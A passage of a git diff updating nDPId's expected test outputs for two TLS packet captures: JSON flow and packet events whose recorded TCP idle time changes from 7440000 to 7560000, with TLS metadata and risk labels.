{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2
IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtwjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="} -01034{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2
IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtwjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="} +01034{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","packets-captured":3,"packets-processed":3,"total-skipped-flows":0,"total-l4-data-len":2148,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1590680391590} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3/3 diff --git a/test/results/tls-rdn-extract.pcap.out b/test/results/tls-rdn-extract.pcap.out index 65193d1d1..09e959b1d 100644 --- a/test/results/tls-rdn-extract.pcap.out +++ b/test/results/tls-rdn-extract.pcap.out 
@@ -1,13 +1,13 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946681200000} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00631{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAACnLudAAIAGnZoKAAAB1ceV+3ppAbtkZ4Ye79i2a1AYQCmgXgAAFgMBAHoBAAB2AwEAAAAAM7RDB2u\/HXE+9PsbFMYgy+4A2s6CH4THeQytZwAAGAAvADUABQAKwBPAFMAJwAoAMgA4ABMABAEAADX\/AQABAAAAABMAEQAADmFkczEubXNhZHMubmV0AAUABQEAAAAAAAoABgAEABcAGAALAAIBAA=="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
